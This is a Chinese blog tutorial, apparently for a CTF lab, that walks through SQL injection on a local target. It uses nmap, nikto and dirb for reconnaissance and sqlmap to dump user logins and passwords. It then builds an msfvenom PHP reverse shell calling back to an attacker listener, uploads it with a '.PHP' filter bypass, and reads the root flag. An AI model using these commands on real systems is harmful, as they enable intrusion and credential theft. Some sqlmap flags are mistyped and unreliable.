6-1CTF夺旗入门教程--SQL注入GET参数

1.SQL注入漏洞介绍

SQL注入产生的原因主要为以下几方面:

  • 不当的类型处理
  • 不安全的数据库配置
  • 不合理的查询集处理
  • 不当的错误处理
  • 不当的转义字符处理
  • 不当的多个提交处理
2.信息探测
#扫描服务器信息及服务版本
nmap -sV 192.168.2.116
#快速扫描靶场全部信息
nmap -T4 -A -v 192.168.2.116
#探测敏感信息
nikto -host http://192.168.2.116
dirb http://192.168.2.116
3.深入挖掘
#对nikto和dirb的扫描结果进行分析,查找可以利用的信息
4.漏洞扫描
#web漏洞扫描owasp-zap

在这里插入图片描述

5.漏洞利用
#对扫描结果进行分析,如果具有SQL,可以直接利用,毕竟SQL注入是高危漏洞,可以直接获取服务期权限。
#使用sqlmap利用SQL注入漏洞
#查看数据库名
sqlmap -u url --dbs
sqlmap -u url -D  "数据库名" --tables 查看对应数据库中的表
sqlmap -u url -D  "数据库名" -T "表名" --columns 查看对应字段
sqlmap -u url -D "数据库名" -T "表名" - C "列名" --dump 查看对应字段的值
#也可以尝试直接获取shell
sqlmap -u url -os -shell 
#information_schema 系统自带数据库

在这里插入图片描述

#查看数据库中的字段,值
sqlmap -u "http://192.168.2.116/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6.上传shell反弹权限
#攻击机启动监听
msf>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set lhost 192.168.2.110
>set lport 4444
>run
#生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.110 lport=4444 -f raw 
 --->>>>   /root/Desktop/shell.php
 #上传shell并执行
 #绕过过滤机制,把.php改为.PHP
7.获取flag
#一般情况下,靶场机器flag值存在服务器根目录/root/目录下
cd /root/
ls
cat flag
#完成测试、总计文档
#如果无法在该权限下查看flag,则需要提升root权限
8.总结

靶场机器如果存在SQL注入漏洞,可以利用sqlmap进行获取数据

获得靶场机器shell之后,可以分析是否需要提权

SQL注入往往要和上传漏洞配合,上传shell

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值